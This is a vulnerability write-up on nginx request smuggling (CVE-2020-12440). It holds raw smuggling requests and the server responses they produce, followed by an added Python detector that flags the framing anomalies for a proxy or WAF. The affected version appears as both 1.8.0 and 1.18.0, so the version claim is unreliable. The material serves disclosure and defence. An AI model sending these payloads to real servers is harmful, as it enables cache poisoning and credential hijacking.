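(CVE-2020-12440) Nginx \<= 1.8.0 Request Smuggling
1. Vulnerability Overview
A security vulnerability exists in Nginx 1.18.0 and earlier. An attacker can exploit it to poison caches, hijack credentials, or bypass security protections.
2. Affected Versions
Nginx \<= 1.8.0
3. Reproduction
Request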
```
GET /test.html HTTP/1.1
Host: www.0-sec.org
Content-Length: 2

GET /poc.html HTTP/1.1
Host: www.0-sec.org
Content-Length: 15

```
Response
```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 33
Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT
Connection: keep-alive
ETag: "5eaae270-21"
Accept-Ranges: bytes

<html><h1>Test Page!</h1></html>

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 15
Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT
Connection: keep-alive
ETag: "5eaae23d-f"
Accept-Ranges: bytes

NGINX PoC File
```
Other examples
Request (200 OK + 405 Method Not Allowed)
```
GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked

46
TRACE / HTTP/1.1
Host:www.0-sec.org
Content-Length:15

kk
0s
```
Response (200 OK + 405 Method Not Allowed)
```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br />
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

HTTP/1.1 405 Not Allowed
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 157
Connection: close

<html>
<head><title>405 Not Allowed</title></head>
<body>
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
```
Request (200 OK + 404 Not Found)
```
GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked

46
GET /404 HTTP/1.1
Host:www.0-sec.org
Content-Length:15

kk
0s
```
Response (200 OK + 404 Not Found)
```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br />
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
```
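The requests above share framing anomalies that a front-end proxy or WAF rule can flag before they reach the server: a body length on a GET, Content-Length together with Transfer-Encoding, whitespace before the header colon, and a request line inside the declared body. The following Python check is an added example, not part of the original write-up or of nginx; the function name `framing_findings`, the finding codes and the `SAMPLES` byte strings (built from the requests on this page) are assumptions made here.

```python
import re

# A request line inside bytes that the headers declare to be a body (heuristic:
# a legitimate upload could contain such a line too, so treat it as a signal).
EMBEDDED_REQ = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]\r?$", re.M)
BODYLESS = {b"GET", b"HEAD", b"TRACE", b"OPTIONS"}  # normally sent without a body

def framing_findings(raw):
    """Return a set of codes describing ambiguous framing in the first request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method = request_line.split(b" ", 1)[0]
    findings, headers = set(), {}
    for line in header_lines:
        name, sep, value = line.partition(b":")
        if not sep:
            findings.add("malformed-header")
            continue
        if name != name.rstrip():
            # RFC 7230 section 3.2.4 forbids whitespace between name and colon.
            findings.add("space-before-colon")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    lengths = headers.get(b"content-length", [])
    has_te = b"transfer-encoding" in headers
    if lengths and has_te:
        findings.add("cl-and-te")
    if len(set(lengths)) > 1 or any(not v.isdigit() for v in lengths):
        findings.add("bad-content-length")
    if method in BODYLESS and (lengths or has_te):
        findings.add("body-on-bodyless-method")
    if EMBEDDED_REQ.search(body):
        findings.add("request-line-in-body")
    return findings

# Constructed samples: the page's requests with CRLF line endings restored.
SAMPLES = {
    "cl-only": b"GET /test.html HTTP/1.1\r\nHost: www.0-sec.org\r\n"
               b"Content-Length: 2\r\n\r\nGET /poc.html HTTP/1.1\r\n"
               b"Host: www.0-sec.org\r\nContent-Length: 15\r\n\r\n",
    "cl-te": b"GET / HTTP/1.1\r\nHost: www.0-sec.org\r\nContent-Length: 4\r\n"
             b"Transfer-Encoding : chunked\r\n\r\n46\r\nTRACE / HTTP/1.1\r\n"
             b"Host:www.0-sec.org\r\nContent-Length:15\r\n\r\nkk\r\n0s",
    "clean": b"GET /test.html HTTP/1.1\r\nHost: www.0-sec.org\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, sorted(framing_findings(raw)))
```

Rejecting or normalizing any request that returns a non-empty set at the edge removes the parsing disagreement these requests depend on.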